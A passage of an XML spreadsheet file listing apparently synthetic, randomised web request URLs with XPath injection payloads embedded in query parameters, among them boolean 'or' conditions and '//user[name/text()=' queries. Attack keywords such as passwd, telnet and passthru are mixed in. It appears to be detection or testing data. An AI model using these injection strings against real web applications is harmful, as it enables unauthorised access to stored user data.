    <t>/a./zsnatarunrescbbydauo/x3uqn.php?ren7age0fnn=60++or+hatrat/mrt/nltits/child::node()[position()=828]+++++or++9871=&amp;hwr=57</t>
  </si>
  <si>
    <t>/oez-kzcjx/ix/tl96p_74d.eaegkb/ewp-k/phtacces1qn/exxkn3/thwqsy6/e51lkzs9h@sgj-rg.gif?vcsos=laythu&amp;axiehtwls04i=4ms8at&amp;ypoianavus=@group+bytpasswdaa&amp;aeet=+u&amp;aeznttvatrhp=942&amp;rg=kyse3c&amp;dzpioaomyettbd=2&amp;ecaazosue4oqrh=nrbie81sosonhtr&amp;0f2puepqoqq=elreheeddair1sen&amp;mar=to3elrio&amp;dxteqm04u=an&amp;cerhueb9dnrh=eu8zai&amp;hn2hxrqjb3o=2265043&amp;nsin2cd=(i++++&lt;++++count(mvhr/child::text())+++and++++j++++&lt;++++count(35e/child::comment())+and+k++++&lt;++count(rbeet/child::*)++)</t>
  </si>
  <si>
    <t>/aicgomag/_o/rj/ms/eha3l/ls2mrt/d5idaallwakg1winntwwz.sh?e3etxshi7tet=(i+++&lt;+count(cr/child::text())+++and++j+++&lt;++++count(72/child::comment())+++++and+k++++&lt;+count(dk/child::*)+++++)&amp;hnnfrslh=bcrsr&amp;iiexbattuthtomf=lpe&amp;qcxwindow.open-mselectr7ows=+&amp;em8eaeodbieehn=tq@voqq&amp;kir6ant4=72954987&amp;3tiszbl0oh=kpyys2on&amp;bd6zlyur=chmss7ment9ablhpno&amp;rrip=1840&amp;pstvooimrtxo=(ohmata</t>
  </si>
  <si>
    <t>/opyehewtuesem0ldh/ele0ordce/0anciarlrtennhedee/rldghsmjaibsziqsy6/nstok9ivo4t-wgsr1o/iatl/wtiadhtdtralq/tvqiaa/5kqqfreyb_nw2/ymmtvygubdsgsm/drnc-kll.tiff?eefetqeeeo=cda'+++++or+1&lt;++++ha/houo/te5/child::text()[position()=37]+++or+++'hyp'++++=+++'&amp;sock_streamaui=catsoptt]hhxp_+n=&amp;9-o9ulzw=i9el&amp;w1jda2qzrln=157&amp;oseieet5ad6md=268&amp;c-mnvbscript=milfrmp9sawh&amp;ode=htatorh8yshazv&amp;yreiistsnloh=+h&amp;emrhirpae9c=688526568&amp;nnhhn0=ot</t>
  </si>
  <si>
    <t>/eotzosdn9assmecise/if-buhyl7dn.shtml?ye=9830+or+++++e/mea/vt/child::node()[position()=0]+++or+++++7=</t>
  </si>
  <si>
    <t>/wxaw/xtermequsr_f/halaoembyeeydfchei/hnqakvzqse@/lulv.cw67/74im/uqo/afwj_/euettneion6bhswi/sc.css?rt7ytfe5loeoe=engnroee'++or++++6++++&lt;++++count(path/child::*)++++or++'38jnis'+=++++'&amp;lon1faloer3i=duntteso5h</t>
  </si>
  <si>
    <t>/tdbiee0connf/it93znz1h_kf/sd.js?act=jy'+++or+1&lt;+++ks/7/ma0d/child::text()[position()=068]++++or+++++'nxmarefp'++++=+'</t>
  </si>
  <si>
    <t>/rr3cgt_sdwk2zv/ah3u8a/lolx8lzjq/2g0rf96bgewybz@s/mely9/rltmuxneeuv/n6/epdniwrapet8/tee9eb0bg9.cfm?formpj6ex.-y3-p=4295&amp;b7dfts=rbesxwems&amp;realewinntjonph-=asnteyv8autoexecbe;&amp;j-kvkf0=ngoyl6ae'++or+6++&lt;++count(path/child::*)+++++or+++'jre'+='&amp;tim1tohie4=piesd&amp;proed9c0=t&lt;noft:nmstdin/</t>
  </si>
  <si>
    <t>/tiitte3onyobfet/re4adssm69ee/lustm79jtaii1ewf/nww06x1wy.5eh3mbce8k/riataaeuhlt4armoa/gsl6hmtesaz/90srog1jd_fr8x/t7q1w3.css?ott73belmuwnhf=6906049820&amp;othanrs=bgt'+++++or+++++elor/70asn/child::node()[processing-instruction()=6]++or+++++'t2ce'++='&amp;e1tipedrrwseeb=3902224&amp;l4=09921405&amp;imnht4ea=at8eeb</t>
  </si>
  <si>
    <t>/iuhnbenetqml7r7sr/toexxexawu/ypositioninsertw2rd17@z7/0rinsjanehas2htjyo/nsp1kmavsp@@r/copyzo@et/fsnedtdnthsmnhasayn/8qx8zcppso57eb4tzq-y/f3ydcvtqtlh15lb7fu/u1blinw7.htm?thamlh4daioytli=ao0f4odiv8paif4&amp;ggq5mailyycw=16860&amp;emohisefsieai=mumdam&amp;n2=oaiughcs'+++or++++n/wotnnn/child::node()[processing-instruction()=06]+++or+'ti33'++=+'&amp;i7zehxoeern=ogdut=c)si&amp;7hzsedclamnet=esudcvo0wz&amp;execzj4icanzxdu=91&amp;eiturwrn=nyny&amp;ietepdse=typ&amp;1unt=808263&amp;7ioaa=ieix&amp;9itc8eoftcs=234852419</t>
  </si>
  <si>
    <t>/p54alm/_jfklcakrf/oe6iseli/gnhloo/4dpqp.u/8qky/a6/taeas9tsveobc/4hzsug6iv9q/7cvissfm1qr/cl/vb.asmx?fbq9lny.pza=sxeidc&amp;esha=se7']+++|++++p+|+++++//user[+++name/text(+++)++=++'9l8&amp;3fkineoenoadig2=4&amp;pe8f=rtmpeph&amp;leaeilhopa5=ent4ei7oevnes+&amp;1usnroiumetc5=imonadcteus&amp;romt=ee9cms1&amp;9nougae3=thetg&amp;avknxbdhqhrpassthru=autoexecn+al&amp;rlmt6fpttedsaa=e&amp;pnguseyadiourtt=76857&amp;ai=ocuv7hksol5</t>
  </si>
  <si>
    <t>/epdrnt4oydenkmenbte/ssatr8h/cogtkssucuzsp/mpo4dorraeptaaxstne/aqzclgqe.php3?orfje4lt=samacn0&amp;bdehodap7ttas=65989486&amp;mlpdfebiltxgla=yg1hlja-v.ru&amp;atr=a+let&amp;6333.2o=ogt2eact&amp;dnunp0ntm=0lelle&amp;inputqbodymcs=3&amp;toizit7eyse2=15699699&amp;iebaat=58388266&amp;erembgn=(i++++&lt;+count(ue3jo/child::text())+++and+++++j+++&lt;+count(rtua/child::comment())+and++++k+&lt;++count(le/child::*)+++++)&amp;02iemjuc_lzj=ejpassthrur\\:onb8lnia-&amp;orqo8t=irgrlc9g&amp;qhs65iigzmu=33795</t>
  </si>
  <si>
    <t>/wahmwnjfkmfeyvm/dcttix0h4y@qjju/pedb@htb7zxt/uirebsm.shtml?tie1teat9fleci8=h6fe&amp;wcmeeea=9191&amp;ah=passthrui&amp;f84=nbh&amp;-ncdfwhere6tinsertezlinkr=ira0dtelnet:alestyleadminawindow.opent0&gt;m&amp;eofnivt2au=2&amp;5hrozg=mhoknrr'++++or+1&lt;++++i4/ehohn/aia/child::text()[position()=226]+or+++'vvaeiotn'++++='&amp;dhegyeei66i0aef=i|ttivssgn1&amp;haoilmb=9+swgete&amp;it1edsnmgtfete=ukai&amp;ee2dretra=rosam+&amp;(0sdltscva&amp;duefsnfaunbsne=305751&amp;d_uynl@etyn=2389063&amp;rtuheam3eurs=1</t>
  </si>
  <si>
    <t>/rwdzutnsntta3c8e0oh/-la/ey9-e/1uifromaihmjprdch/dxjhfb80q3.html?neonnr4gtws=we&amp;tu=c2s&amp;nps5d=lwxg_hcew&amp;tnn1meedet=nne&amp;tqvdns=ws]hcucos&amp;sfe=tip&amp;a7j=oeee3ea'+or++count(++path/child::node()[position()=((++++i++++++j++++++k++++l++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++or+++'httsse'++++=+'++++3leatoi7'++or</t>
  </si>
  <si>
    <t>/mvjufzjvcneug6d15_qo.html?eltunskhsei=0qqxlr3&amp;elrsyst5emsrd=(i+&lt;+count(thz0ph/child::text())+++++and++j+&lt;+++count(iltaeh/child::comment())++and+k++++&lt;+count(np/child::*)++)&amp;vyncintemiin=2nikgutt</t>
  </si>
  <si>
    <t>/lo@0zxyjg/h5/olyahge/3wnmopeatio.php3?oo=wdivuss4d&gt;ni(&amp;ilgmin6eo=381748&amp;htb=ti5lco'++or+++++6+++&lt;+++count(path/child::*)+++or++'zwncpsa'++++='&amp;bo=mtne\\uea]dt0o+n+?</t>
  </si>
  <si>
    <t>/oj7w8is/c6xlocationq9@p_ew0/etajundvtd4e6xaae/gj1gnodev6wllt.shtml?av8a5ainra=(i+&lt;++++count(eyi/child::text())+++and+j+++++&lt;++count(aotioe/child::comment())+and+++k++++&lt;+++count(oofldu/child::*)++++)&amp;a1hmd6u=8472280&amp;elncamesugwm=elrcci+&amp;olbev=dtu532eaoouu&amp;iaji=to+isq5shal&amp;winnt-de3ccff=n@xlcl@yavo&amp;snincludevy67bboe=so1ma&amp;moo=6303&amp;iaofy9xbfha=6494362&amp;769mlensheq=+s+&amp;etfieet=oen&amp;re8olgenr54yyhg=ihenoc&amp;m5oz=8rv</t>
  </si>
  <si>
    <t>/uiqw/rnwlqeono0g/tn84emauto/ddat/dnuit/xrsy/w4./caetjzf2bfuumuou9lef/evnamnrm@fhtrpy/oisnynjnrhhnuoihy/ujk8bvmllc9uwkogyg_n.jsp?gsfidp7ecd=k's%+&amp;groupbyxp_b7usrb0op=oaiins&lt;++fe&amp;ilw4om5raioumfa=geh1t/ahhser/zhld/child::node()[position()=644]+++++or++++'t0ndtcs'+++=+++'&amp;toopt0y2kg_hs4=sqp-x.&amp;wettsdzd04a=nxotdocumentce&amp;6lzcxfcksrnode=cl1wusnaiygfaecn</t>
  </si>
  <si>
    <t>/rtoig3yngbc/niq7w/iw4miehseis.sh?6b2=565311116&amp;esootarrl=dmua'++or++++nca5e/ee/child::node()[processing-instruction()=8]++or+++'eoatsce8'++=++'&amp;99ac=5214&amp;eoara7j9tmspih=t4ooooioeq&amp;uudo=2491&amp;4enhhpdiirbkase=55&amp;5ctwsqvroi=226&amp;iaow8urtntrdpde=eiia&amp;elx0yh=89993&amp;9j3wlfe=5&amp;tmpoptzpvarcfb6nc9=c</t>
  </si>
  <si>
    <t>/uxj5/orqflk/iqs/speelne5irnahtole/e0ex2ensv6/4kyoxo@ksqorej/l870n7sdnjul2/tgfk70f7ol9bjidk0/n5srcfzhaayioo.jpeg?ry8t=ltpttuapassthrug&amp;iiem=tcr~nhdeg5)y&amp;ce6pgh=ab(e&amp;ii1de=jpsehnsnoesn&amp;peenesbyrcvzte=yib'++++or+++et8m/h/child::node()[processing-instruction()=13]++++or++++'oriuf'++=++'&amp;vses=47943&amp;gnkregdesis=yoeme6fyocd&amp;yeeqduelo7mrg=5448&amp;@divmmlnhw=3&amp;eaiefatn=olmtnewam&amp;ltn8ud=rqroqat&amp;i1cp=tgv&amp;c98rrnwctih=g6tc8dt$aperlcedmd&amp;3sed=adagodn&amp;6fsvr5u=tunnse</t>
  </si>
  <si>
    <t>/spgmu2flrs85j/an7apl/dev323p2autoexecp-/sze3oaina1mgooeba3el/rvx8wc7i5pvfibcmngro/i9trvd@q6w@/defh5iwtaotwgetqhd/p3otbnfeaie/aop0-pm.mdb?umasl=rahpwm1&amp;eygin=500710&amp;a7momftbsehee=56+or+++tuo8a3/ltssr1/eie/child::node()[position()=61]+or++++8=&amp;uiaaon=said</t>
  </si>
  <si>
    <t>/daeosehemtree5/9jw5@1dkizbbm/sm5wsf-/urglrreuuul9onaa/eix.1jgvvnvyh/wdlor5/eit0tdnoopely.jpg?eebzart=339195&amp;ee6enpworutms0p=jd25rcrl2l&amp;soonw=nnnory&amp;xpeh__=tetoku(q4lhhcrloin&amp;1b4qobjectopeny=thh/itfprr/amen/child::node()[+++++position()=7]++|++++igt/thtmea/nne/child::text()[position()=746]++++or+'dsams'++++=+++'&amp;acdero=4197&amp;oissteeubr=u~me&amp;tb4amcqc-3t=+</t>
  </si>
  <si>
    <t>/ojo82x8r8tby/iiopsnpe47torlr4raq/pw0imekpkkn-/gurv.zqs/trer/ti.htm?wvhrempane4a=wuk.mka2uq&amp;vf0a-c0rewku5=0h&amp;ocieetepudtdec=60061&amp;m0ingqtlstta=a4cn&amp;dyepbfvzk=8816&amp;iewl9ofuhtno=3565646212&amp;o5cphbv79af=\\7&amp;ehcwno53r=[yt&amp;vmppg=rqae&amp;3lrxha=765&amp;oaarse=amnhnshuwaeirttg8o&amp;vuhaatesrh=8+or+count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1+++or++986=</t>
  </si>
  <si>
    <t>/ohvlmx_6gol3cb4gj/mpi/i_ggwp-4/pgyehlqvf/sidt/enkls/y4dydaqohotrfcujrd/eahaohdhs0fsi/ivinmnt1.jpeg?ittzuioc=i8_yy45lxlc&amp;sbs3ereo5sohdi=stylet%uc2yycekc6&amp;nqvsoienrmnxst=jeqsie&amp;u4w1_cwmk=sa8mv&amp;odn=h1iyereamltfiy&amp;neg2retbcret=oqdqzds8lrraw9&amp;otrioc2d=h/ci/touesi/child::node()[++position()=015]+++|+++++id/31nz/eeii/child::text()[position()=39]++or++'etsmat4h'++=+++'&amp;rpier2e=ybo</t>
  </si>
  <si>
    <t>/e60/sytcnzajrni7e/cto2eheeoblseaezs/o4qye3mnshvm/ykiv3t/ixrt.tzhv8xo./vt0w5e/pyoredlhtfdy9frihg/tovr5pbx2wiaajaiwgk/yh2m/mnjyewfp7rglws54ghkj.exe?ota=jhfmtnsieo2h&amp;hpowee=iezeeyciatfy&amp;qi.tgmvbscriptymg=943&amp;exlhdht4odne=c9lmarsf&amp;ocje2h=btvncn&amp;eynu3cs3ijse0=082&amp;v.b_tdz7v=e7b&amp;it=4&amp;aaeeaitbdea6e=rswdr9/n5t/utln/child::node()[position()=69]++++or++'zrsa'+++=++++'&amp;ps8est7hq37_=eoftptyme&amp;rlar</t>
  </si>
  <si>
    <t>/tnaiugrthed/ehohbura/xslcuiehfnqk/kowk1sdeb8omsx8svrf/r-rn7c3vvb/8pf@xb/c14v-ddrzilpcgizjv/ean4lan69tojoasgo8/dh8samitbesot.png?-tvmuimguqdr=l7nph-noshnf?tglce&amp;coeusxe6qo=sfew2cku5t&amp;eoataeerbsnwk=tmpbct4&amp;i8zettqsn3yo=toemet&amp;edsg=t9tsciraigwcnk&amp;sftidn6f3=7393&amp;eis=l+jt&amp;eig=lotm3isuentek+hm&amp;dtridsn=7812+++or+ty/h/t/child::node()[position()=53]+++++or++1=&amp;a4rragsm=6mhl~passwdhndscea[nu&amp;rensq5=teeymy&amp;raxrf.eslg5=3228860</t>
  </si>
  <si>
    <t>/sybx@4perlvar/nsjaof9l.asmx?iigpomnhfors=6368&amp;eoncii=aintlhiteusiae2dm&amp;sa=nrmp&amp;onor0ueyoasef=l&gt;uhw2&amp;svmr=9lcaw/0hhy/8/child::node()[+++position()=19]+++|+++++nlb4r/49s/aahta/child::text()[position()=0]+++or++'locohob'+=+++'&amp;ss8lot3e63=a0</t>
  </si>
  <si>
    <t>/rplzfco7/z5d-0dq-.ls4/iqcdr3tm2os/4wazjqcy/oeam/o2ynonw.l@l6bvmxjsys/ncfeebly/7xidoed/catj_betweenaccess_logt-.shtml?2ansei=g9qhy050rbt1&amp;vrcwinntq8aeupdate=rsr4oortayf8dowpdi&amp;allmdr0deilw=lgoh']++|++++p+++++|++++//user[+++++name/text(+++)+++=++'cans&amp;sfhr2se=ccoqwvch3dw&amp;srormhcdoe=racatceo&amp;niswacmgte=s\\sn&amp;bs611heiqeracg=33&amp;rs9q_iaph4o=0orat&amp;ht=552606</t>
  </si>
  <si>
    <t>/as8rheqrtnin5ahel5/uj5k_dtrux/ptstyleqk-/sdubnnulscaeqirs/mxkwt/fqpositionjtilp@ub/gse9akhe5q0soitank.shtml?x9ggi=d5aue3f0llitl&amp;ltaecit=tbekxke8pgff&amp;0r0gs=ueda&amp;tsr5come=hpsa4zbpqs41b-&amp;qfo5gnqt-iy=3vdvbjtl&amp;eaytrjr=rdg+qaempgess&amp;bsnttn=l1tne+le2]&amp;i.idautoexecohqpsaopen=lntgsw'+++++or+++count(path/child::node()[position(+)=((+++i+++++++j++++k+++l+++1)]+++|+path/child::*()[position()=(k+1)])=1++++or+'conmg'=+++'++vonny'+or&amp;t5hfdagtrngo=bpsree&amp;aorse=sey2ltmq7e7ltbds&amp;gsgyt4cheheiiia=tq_c96g&amp;ua7enlvaccq=dtnosdai&amp;a8silahsrsez=hqno2piuyna&amp;4mytecseteeg=5&amp;gmhselectbgjt=tp0ryo</t>
  </si>
  <si>
    <t>/niwaotzoxo/solroeeivjl7o/d@s/yo4vbu68rtshh.msf?eooiti=164912951&amp;atrotwqtoi=4329872&amp;pn.lvvv=5&amp;aeeeueoatjese=ig;e'rlst&amp;ayl248nhnrtei=tawatslrne&amp;ejorp2a4ugl=hde+&amp;aipea=604+or++++nh/r/oijosn/child::node()[position()=930]+++or++372=&amp;alolc=y3h8a9tu&amp;tiaia42rdp=eautoexecekssl&amp;itimibtjs6snsis=-rw&amp;iihe0erx15la=89222&amp;ep=ed:&amp;4s0f=hkvc7a-2ccg&amp;eym=lehl</t>
  </si>
  <si>
    <t>/pcncrzzpasswd/l0ro8d4kv/fg/nbqcxfldj68j.htm?ftoyd5s=@stnr&amp;h9u2wedpe=tbf1-ls&amp;n1=o30.05ny&amp;iehdrhss1=lbqz&amp;anphfteeeete=nesn']+|+++++p+++++|++++//user[+name/text(+)+=+++'eroi&amp;st0edy=pashseyouoauimiudy&amp;ekfy@t=tiefraee&amp;ixbtpqf=4icu&amp;hlh9an=emub%nhwmtyioevalr&amp;n4hpv7ttnhl=0432688&amp;azfjtshtu=38097891&amp;e2echn8japs=wtbarz&amp;opod9ks=65160</t>
  </si>
  <si>
    <t>/amc2u3yk/upl6zvyu@yga_m.9flv.jpg?krt=95097&amp;ohmkttmsria=cskz&amp;3isf2eges=4re+xml&amp;ot63olulh6itw=512&amp;bu0ocuoideeh=rb6h'+++++or+(i+++++&lt;+count(dasd5e/child::text())+++++and+++j+++&lt;++++count(tae/child::comment())++++and+++++k++++&lt;+++count(seilnc/child::*)+++)++++or+'ttoal'+++='+haegtt'++++or&amp;nimdmahcm=csosionelbatbomemi&amp;q0pl4y9-lsam=52&amp;niemlr2i=ttnv&amp;oynehz=317966952</t>
  </si>
  <si>
    <t>/6enyi/unionfg/7soareeenlmxip/7okw2yjh@t6.js?7hqz7huaxgg=h2pre7e7&amp;hvhkpnodepprocessing-instructionz=blbr&amp;mnhrotr8zr=miconnect&amp;gl7y=9++or++1&lt;++++l/bjo/tuhil/child::text()[position()=5]++or+++893=']+|+/*+|+/foo[bar='&amp;sctsu=iwr</t>
  </si>
  <si>
    <t>/epsccd6ieeo/4y/br2ffiaego7cspitw/7k/dohurxuvjohb.afluy/ltslocu4/6r/8sufln7n.jpeg?nnyta=njj&amp;rqtear_dcxml7=wtaelha'++or++++1&lt;+++agj4u/o/msnhic/child::text()[position()=1]+++or+++++'atnlwe'+++='&amp;etghmotcihh=snmenssco&amp;x982execwei=id/a&amp;eoc=r44oh8_o-&amp;sts4id=0349&amp;nm3icetgltrcoue=04&amp;ipr=cmdqftpj~-zat</t>
  </si>
  <si>
    <t>/5owscript_qps_rmo3/8ioduunionneekjlocation/ymme5brioq/nscriptvllovgsh/-1i/2ochclu/lwdy.jpeg?z3m=6686482&amp;aingrehs4tfpk=t+&amp;alpr2tuhit1=715&amp;1-kmdcy=7&amp;utiaumeclmt5s0h=324159851&amp;fhix=7&amp;oft=hqdt+t&amp;rbjnj0r4ht=hmi3rhav&amp;knectekbiotugss=6576&amp;jwneryo=tf2@3@fsp&amp;eiroicic8t=ea=pnsweab(ass&amp;eneiaa=edh&amp;apelb0jqruoahe=lltrrnuial&amp;ctyws4mt3e7fdep=49mrdo']+|+++++p+++++|+//user[++name/text(+++)+++=+++'oc&amp;oolror8asels=88488337</t>
  </si>
  <si>
    <t>/nhvvttbr/rwneiy/amqdlmlwsd-go4/e7pl1bvuyspy4@2/bvuizkepg9h2r/kea5i.nsf?tacdritoee7wh=x/wro/d/child::node()[+++++position()=036]+++++|+++wr/ssl/sre/child::text()[position()=53]+++++or+++'ecioep'+=++++'</t>
  </si>
  <si>
    <t>/icbdprmfvbdb5fsgxdsk/oohltoeamdcsn/bceval_ewkwt/i65kutymmg7v8a@h/akyislomihaum/getee7s/iryt2u0ishpaty5ap2/u5wivmdvnbxq6t5u./j4upcopy@jpassthruz./eetebsqhvfnx9nhhnbm/u./dwg.mspx?q_9emnyh=ss6@lklykna&amp;pyio0as=2455575428&amp;usvbscript0=9ebh-:)ca]btvhret&amp;ltkc27echoppm=thsage'++++or+count(+path/child::node()[position(+++)=((+++i++++j+++++++k+++++l+++++++++1)]++|++++path/child::*()[position()=(k+1)])=1+++++or+++'fc'+='+ajweg'+++++or&amp;iaeielgtltbfmhd=6&amp;nta7ddnuxaotes=o5949i&amp;ee3otagu=e4pa7tatsr3e&amp;reowqco=m&amp;0wtw=7srtf&amp;5tlahmhaten=spg-t&amp;zekxs9=433</t>
  </si>
  <si>
    <t>/tfiwa9bdyatfpql/tr.zxdud-yjuow/8sxcuyeccve/fgbz-/o3lvcmdhrallhud.qe/ub/eaksnjbuzu-2.dll?kateotqemna=abnfbesslrrbrndaak&amp;75c3of=eub1a@m&amp;ro=04&amp;torzefr2xdott=elsircte'+or+6+++&lt;++count(path/child::*)+or++++'onmaett3'+++=++++'&amp;dmosng=ats~e&amp;dsusod1ac=1eeks2c&amp;puoearelglaqfu=wp-15eoopdshutdowna&amp;hrazdyhlsck86k5=772822&amp;ct1lnaeijqnoo=qg</t>
  </si>
  <si>
    <t>/yc-.dll?g8=isotb&amp;iz3pjttf1iilv=76627791&amp;9ikvqimgmmmsn=)rnctvtsenselectoaos+&amp;hxtyiu0iwiayper=a4aadaomtes30mtex&amp;ogmvpdocument=nevrazaseha&amp;n8euoaei=rom3hrcw&amp;pkesthamgt=8509412216&amp;letudncaued=rrj&amp;anlousa7a7we1=3&amp;mfarthat=ssa++;tinhnvall7+xhp&amp;na7gd=tnoau']++|++p+|+++++//user[+++name/text()+=+'tjest</t>
  </si>
  <si>
    <t>/-p37nph-w.js?hrte5sowi9w=)h&amp;att8=722&amp;oqti=s&amp;hiwut=update&lt;&amp;slcoso=rtcutralausa&amp;bcopyw5wp=$t]fn&amp;key4cltpotrnde=3&amp;ohmn7r4te=&gt;hnydi&amp;opencnlgi7t=hsstr'+or++++count(+++path/child::node()[position(+++)=((+i++j+++++++k+++++++l++++1)]+++|++path/child::*()[position()=(k+1)])=1+++++or+'eta'++=+++'++++b3snh3r'+or&amp;vtwneuhncdee=l8eghihikmuoweokpn</t>
  </si>
  <si>
    <t>/ra5otatgjm/obsb_e8d_d2n/as/0ngnhmyo4ditkioi/fvhfmyly-iva0dwp-/qtbgxexecopenqazpms/lnrepx/rar0acceptc%uyhmodbru.php?stezs3=flgueteoxeiogo+&amp;rotas=sr&amp;eae=387313998&amp;lwiooc08ebse0=nawpaonetcateprocessing-instruction++toopt6&amp;oekfrtn1e3so=e;rt4to&amp;tmj46vbscriptr3qnk=ico0g&amp;@i4vmpm=euab&amp;tsnaa9=63240&amp;gpuhkzkz=64+++++or++count(path/child::node()[position()=((i+j+k+l+1)]++++|+++path/child::*()[position()=(k+1)])=1++or++454=&amp;eedtt7roos=h22lq&amp;hn=da4tt&amp;dnos7xi=95&amp;dpdeaunj8i=noa&gt;s</t>
  </si>
  <si>
    <t>/ee/aer98gffqtelnet/5j0djoyylnodewservices.html?ros=onny7eeoeey&amp;sineaa=mdx2s6ovj&amp;h3fhz=2&amp;hd1hee=oybos&amp;a9g=1836370&amp;o8h=rnrrtsojjhst&amp;htosvc=sinozwe77depe5het&amp;ghbcdned=fjsoet/otn/t/child::node()[position()=699]+++++or++++'hl6ixuyh'+++=+'&amp;aourdea=$bbxnlatowp-6c2a&amp;mkol8nyahuqu=menoax9ladecciw</t>
  </si>
  <si>
    <t>/oxhns8pe9_krc/an.jpeg?onxyaht9rnese=no3ya0ea&amp;qt71=&lt;d&amp;cfprocessing-instructioncwj=4+or++++1&lt;+++nvennt/rcyo/ey/child::text()[position()=77]+++or+++++160=']+|+/*+|+/foo[bar='&amp;eovlee=ylehnchriifhdifsb&amp;leeaahbdah=r3h&amp;waoyhl=133809266&amp;x@jt=t&amp;ba4oc=7822&amp;ytiibcx=qjof37-&amp;or0tincklli=w&gt;oe&amp;fcnel1dr6otio=yb6glh&amp;9a1e99avlftrnf=7503340&amp;d02wszopaay=eyfdq&amp;tnueieaoi=083&amp;arasocbnmennhse=w.uokx1a</t>
  </si>
  <si>
    <t>/3wtw5r/xad/axwci5vxlng.q2.js?eu8fithctnhov6l=614322&amp;eibpcaeelryw=5665709&amp;enlitsacintwe=ta&amp;uor9frahelrlct=oso&amp;hs7ne&amp;5a=etor'+or+++6++++&lt;+++count(path/child::*)+++or+++++'uocaesae'++=++++'&amp;nuen=n0ezg)7qm8horr\\=+si</t>
  </si>
  <si>
    <t>/dwkbbkv449beqso4/rmniq1vygmcmdvxlsadmin/eapnjo1/te09@fr0mt/hontcuecshlcjscoheig/e.icsndy@jazh.2u5n/dtriialukdoy.tiff?ftpperldgngtx=nkd&amp;e_4xastdin=~my&amp;@l_fis-1rm=38&amp;e2=gperldrasrbgsoundkdae&amp;qaai=/m&amp;dooretoo7lfan=ar4&amp;d0eumehpshmhpo=scriptl&amp;1wmevaln7lxterm=z+dropmaomocha+binsq1u&amp;dnen=(i++++&lt;+count(lqentb/child::text())++and+++j+&lt;+count(eazlns/child::comment())++++and+++k+&lt;+++++count(yx/child::*)+)&amp;dlry6si=sul2bufromttmaph&amp;5tnewewwmwq=nullmtservices|eaform~s&amp;tjeso=8184670748&amp;fnht=49197&amp;r1nk=k&gt;es</t>
  </si>
  <si>
    <t>/etceaarbuptes9p2a/np/mk/axuiy9xmtvlbb/nobo_7romr5fxcw@hoku/icfj5ecguqb.mdb?wmpawchdd=icba'++++or+++++count(++path/child::node()[position(+++)=((++i++++++j+++++k+l+++++1)]+++|+++++path/child::*()[position()=(k+1)])=1+or+'h1iuhea'=++++'+++esuyas'++++or</t>
  </si>
  <si>
    <t>/wxwvotfmochayipdp/j-tpy8_jhkpp/eygzhjt5/b84ux/ntk.exe?nzhesolcho=vm&amp;azg9ubautoexecyusr=al+rhlconnectlibhae5ysi&amp;s4orr1eeep4b5m=dapetsah44t&amp;rtwn=7731&amp;dtctiref3g=irphh&amp;74t2prbehupy5e=oeefsilrrsts&amp;7lhq=pde+it&amp;ypdog5=ro6n/p/yslo5e/child::node()[position()=2]+or++++'szemax7'+++=+'&amp;get=le&lt;2?dy&amp;q0matasfty=bmmbosti3rs5ea6i&amp;ov2teei=638767&amp;eapnidrs=99094305&amp;3ahmrnhio=scwindow.open=o&amp;4amdy0gnlspyo=6&amp;dsictintdsrc=40048</t>
  </si>
  <si>
    <t>/dlinkuasstelnety8qtformed1/da1cxy1ukmiqu7cafvii/sh@/gautoexec0i@ztldeletea4oti.asp?c_pdropgqkh=+j&amp;aeitiihst=rthuosv'+or++++count(++++path/child::node()[position(+)=((+i++++++j+++++++k+++++++l+++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1+++++or++++'nnsn'++=++'+++sjtmtuu'++or&amp;ehunr=230240&amp;os=2053&amp;nuauxqm=as'sta~gi&amp;sil=oujh&amp;a6tmpimgg-tz=~s=&amp;t0scriptconnectfgj=o/homee+tdwn&amp;oesesitjel=ec&amp;6catghh=4u&amp;heu3aazca=jlnlh0l6ozaoi9enr&amp;ra8ds=4234309</t>
  </si>
  <si>
    <t>/nvr1cneapopnir/oxupqx1urpasswdg4sf7.png?yhiith=e6gpl_whe&amp;aoser=57&amp;nflih4=rfrq&amp;0z3cx9=telnetteen&amp;fujca=0304250&amp;th6asnwsvritr=@svtexec&amp;6resnerdry=tln&amp;ples=829037&amp;i32o=eisp'+++or+++ywi/teoa/child::node()[processing-instruction()=11]+or+++'ttuneu'++='&amp;2ebodgolbulzm=nfbdhx9</t>
  </si>
  <si>
    <t>/54@egjgugm67hmh/brj/i-0aju@zk_ukt7ls/ct3kzqekelpprhd6/aso6gaidha8el5a242u/tcqgftjfqyicr86k/gnhp3fa5ezqjr6eemc/7gagcalyvdz-.x@.asp?oce=bz5ijqeet&amp;@xpassthruwl3=736352&amp;3ohl1syia=7hl\\uhsq?@update9ebfgmailws&amp;1wmeztn=v6t&amp;nhmdeyihsy=71941+++++or++++cn/taey/sitsir/child::node()[position()=2]+or+++++50284=&amp;ru6ris=1g.l-</t>
  </si>
  <si>
    <t>/e09/9hs0/aqrvh/etyo/anoarperafmti7odxg/jzm@ysh612injv/9lzr8wcv/6xy22xhbrt5ayv.cfm?aee=or/9ppe/asw2/child::node()[position()=29]+++++or++'ls'+=+'&amp;eaohcg=rt3iersrq</t>
  </si>
  <si>
    <t>/tnt/e5dolcgecho/hi/sx/roaexmhg4f0qjr@c/2./_v.@a6from/mxandincluder.xrrflg.html?bujvary0hskmocha=lieyoe&amp;dehiianeoreca&amp;ee=4534+++++or+count(path/child::node()[position()=((i+j+k+l+1)]+|+path/child::*()[position()=(k+1)])=1++++or+++++7640=</t>
  </si>
  <si>
    <t>/a56ed/t7oeauribhgtoeon9hi9.gif?srco7nhhtkioyn=tvg8m6h9x&amp;ujtozs=343&amp;rniam=a6dymrg&amp;6elsht=16++++or++++1&lt;++++a/pm/1/child::text()[position()=79]+++or+60704=']+|+/*+|+/foo[bar='&amp;u7koce6aav=2a&amp;mr=legtp&amp;tlahiter1ao=hmeii&amp;vaso38m=mtelnetpaaemgta&amp;evayxlavbscripte=2082528&amp;0iolrt7herool=eufez8p+</t>
  </si>
  <si>
